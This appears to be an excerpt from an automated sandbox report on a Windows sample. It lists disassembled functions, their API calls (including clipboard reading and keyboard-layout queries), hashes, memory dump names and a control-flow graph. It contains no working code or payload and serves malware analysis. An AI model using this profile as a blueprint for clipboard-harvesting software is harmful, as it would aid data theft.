                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ce6bc6ff71d1a8c4d07697407ae3b5d450af23bfff1a9a29fd96cc425f21c01
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A41F371104302ABE3111B61BC99B277BFCAFA1B04F09041BF986D7341DA69EC09D7BA
                                                                                                                                                                                                                                                                                                                          Function 004D9C20 Relevance: 7.5, APIs: 5, Instructions: 30clipboardCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 004D9C27
                                                                                                                                                                                                                                                                                                                          • GetClipboardData.USER32(00000001), ref: 004D9C3A
                                                                                                                                                                                                                                                                                                                          • GetClipboardData.USER32(0000000D), ref: 004D9C42
                                                                                                                                                                                                                                                                                                                          • GetClipboardData.USER32(00000000), ref: 004D9C4B
                                                                                                                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 004D9C56
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: Clipboard$Data$CloseOpen
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 464010812-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3896003866d9e196f5e942c735a105be1c3c3aad61074d0ab1b34134e7345e92
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2f18cbc0f6c8a3dbd26954e8439ab7c802a903eab365c315afdcc22c9d276e9e
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3896003866d9e196f5e942c735a105be1c3c3aad61074d0ab1b34134e7345e92
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41E09AB230022517EB9026BA6C4CF97A2EC9F54F90F050123F604C6340E6A6CC0457B1
                                                                                                                                                                                                                                                                                                                          Function 004C9670 Relevance: 4.5, APIs: 3, Instructions: 30threadCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 004C9674
                                                                                                                                                                                                                                                                                                                          • GetKeyboardLayout.USER32(00000000), ref: 004C967B
                                                                                                                                                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,?,?,004D9D12,?,000000FF), ref: 004C9693
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CurrentInfoKeyboardLayoutLocaleThread
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 4094687451-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1ddd6823bd2bc3ee9e8a39c3bbd18c243f80e9d84aa9d73e1ce1e55aef709746
                                                                                                                                                                                                                                                                                                                          • Instruction ID: c18c3e67b2d418a81a9ed34cd04b46ff7c576915d0efad72319c368f8fc6f991
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ddd6823bd2bc3ee9e8a39c3bbd18c243f80e9d84aa9d73e1ce1e55aef709746
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9E0E57A6003107BD601EB68BC09FAB77F8AB54B01F408419FA44C2280E338D90897FB
                                                                                                                                                                                                                                                                                                                          Function 004CE5B0 Relevance: 3.0, APIs: 2, Instructions: 31timeCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • GetSystemTime.KERNEL32(?,?,004CE646,?,0041E572), ref: 004CE5B7
                                                                                                                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(00563D90,?,?,004CE646,?,0041E572), ref: 004CE607
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: Time$InformationSystemZone
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 702727434-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: f738a3c553d765e04b5bec4b324b6c4fee79bb83ad17f4052d4625c48ac5b856
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 027c201d87c87fe04e998a3dacbc9da3b97e28b55a26ca5f2fa1b84a2cf7f3f2
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f738a3c553d765e04b5bec4b324b6c4fee79bb83ad17f4052d4625c48ac5b856
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9011D78608201DBC310BF09E85556BB7F9FB78B10FC0850AE48583321E3F68D88DB29
                                                                                                                                                                                                                                                                                                                          Function 0052B440 Relevance: 2.5, APIs: 2, Instructions: 7memoryCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?,00528C3A,-00000003), ref: 0052B447
                                                                                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004012F9), ref: 0052B44E
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 59176d969d8d5ab64b55edfac97e4b95670c40f205a4eeb4c3389c15a55de6de
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2d67d1c8230b34df0e9697497b7d0e8b3de7afbebdcce056a4f33b586f436b97
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59176d969d8d5ab64b55edfac97e4b95670c40f205a4eeb4c3389c15a55de6de
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61B092B9604200ABDE009BA0AE0CB1BB678AB54702F000400B619C1160C630C804EB31
                                                                                                                                                                                                                                                                                                                          Function 004F9340 Relevance: 1.5, APIs: 1, Instructions: 35comCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • CoCreateInstance.OLE32(00549E88,00000000,00000001,0054A654,?,?,?,004FB325,?,?,00000000,7734E820), ref: 004F9365
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CreateInstance
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 542301482-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 32cc378c3d08419dc9c729465278953167982d40ee5e1f975ead0e7be58d7922
                                                                                                                                                                                                                                                                                                                          • Instruction ID: d33697237a28c181885f9fc6147cb760b8f27fbda8fa23562785bbd0682874fe
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32cc378c3d08419dc9c729465278953167982d40ee5e1f975ead0e7be58d7922
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8F0823270111167D7288A2EEC45BE7B7D9AFD8710B05412ABD04D7280D7A0EC418594
                                                                                                                                                                                                                                                                                                                          Function 004CB0E0 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: Version
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 1889659487-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: ee60f9e95fcef11a94c07e1fc1ede8b3207cc5aa390eaa880cb51700aab72f76
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 055774edfa36a1cc0f2afeca4167b9a8919af704cd7fbd49c209ae17ea6089f8
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee60f9e95fcef11a94c07e1fc1ede8b3207cc5aa390eaa880cb51700aab72f76
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3E0C22C0042804EE7608F38A90AB593BB1AB65244F8804DCD4E443213D3B9021FE766
                                                                                                                                                                                                                                                                                                                          Function 004F4A60 Relevance: 43.9, APIs: 22, Strings: 7, Instructions: 376COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                          control_flow_graph 26 4f4a60-4f4a93 EnterCriticalSection 27 4f4a95-4f4a9d 26->27 28 4f4aa3-4f4aab 26->28 27->28 29 4f4aad-4f4ab5 28->29 30 4f4abb-4f4ac3 28->30 29->30 31 4f4ac5-4f4acd 30->31 32 4f4ad3-4f4adb 30->32 31->32 33 4f4aed-4f4af5 32->33 34 4f4add-4f4ae7 32->34 35 4f4afb-4f4b07 LeaveCriticalSection 33->35 36 4f4bf2-4f4bfe LeaveCriticalSection 33->36 34->33 39 4f4b09-4f4b19 35->39 40 4f4b21-4f4b27 35->40 37 4f4c18-4f4c1e 36->37 38 4f4c00-4f4c10 36->38 43 4f4c38-4f4c3e 37->43 44 4f4c20-4f4c30 37->44 38->37 39->40 41 4f4b29-4f4b39 40->41 42 4f4b41-4f4b47 40->42 41->42 45 4f4bbb-4f4bc1 42->45 46 4f4b49-4f4b69 42->46 47 4f4cb2-4f4cb8 43->47 48 4f4c40-4f4c60 43->48 44->43 49 4f4f2f-4f4f35 45->49 50 4f4bc7-4f4bf1 45->50 51 4f4b6b 46->51 52 4f4b71-4f4bb8 call 462e80 call 4a5380 call 439d00 46->52 53 4f4cdc-4f4d05 EnterCriticalSection LeaveCriticalSection 47->53 54 4f4cba-4f4cd4 47->54 55 4f4c68-4f4caf call 462e80 call 4a5380 call 439d00 48->55 56 4f4c62 48->56 51->52 52->45 58 4f4f2e 53->58 59 4f4d0b-4f4d1c EnterCriticalSection LeaveCriticalSection 53->59 54->53 55->47 56->55 58->49 63 4f4d24-4f4d42 EnterCriticalSection 59->63 66 4f4df8-4f4e1d EnterCriticalSection call 4f3bc0 LeaveCriticalSection 63->66 67 4f4d48-4f4d50 63->67 76 4f4e1f-4f4e2b 66->76 77 4f4e3b-4f4e46 call 4f3340 66->77 67->66 72 4f4d56-4f4d6e EnterCriticalSection LeaveCriticalSection 67->72 74 4f4d74-4f4df1 EnterCriticalSection LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 72->74 75 4f4df3 72->75 74->66 74->75 75->66 80 4f4e2d 76->80 81 4f4e32-4f4e34 76->81 89 4f4e97-4f4e9c LeaveCriticalSection 77->89 90 4f4e48-4f4e4d 77->90 80->81 81->77 86 4f4e36-4f4e39 81->86 86->77 86->89 91 4f4ea2-4f4ebd EnterCriticalSection 89->91 92 4f4e4f-4f4e51 90->92 93 4f4e69-4f4e73 call 4f3d00 90->93 95 4f4ebf-4f4ec1 91->95 96 4f4ed8-4f4ee5 LeaveCriticalSection 91->96 92->93 97 4f4e53-4f4e55 92->97 98 4f4e78-4f4e8f LeaveCriticalSection 93->98 99 4f4eca-4f4ed2 95->99 100 4f4ec3-4f4ec8 95->100 101 4f4f0c-4f4f12 96->101 102 4f4ee7-4f4efb EnterCriticalSection 96->102 97->93 103 4f4e57-4f4e67 call 4ff020 call 439d00 97->103 98->63 104 4f4e95 98->104 99->96 100->96 101->58 108 4f4f14-4f4f29 101->108 105 4f4efd 102->105 106 4f4f01-4f4f06 LeaveCriticalSection 102->106 103->98 104->91 105->106 106->101 108->58
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32 ref: 004F4A89
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4AFB
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4BF2
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000), ref: 004F4CEA
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?), ref: 004F4CFD
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F4D17
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4D1A
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F4D36
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F4D5D
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4D66
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F4D81
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4D87
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F4DB6
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F4DC0
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F4E05
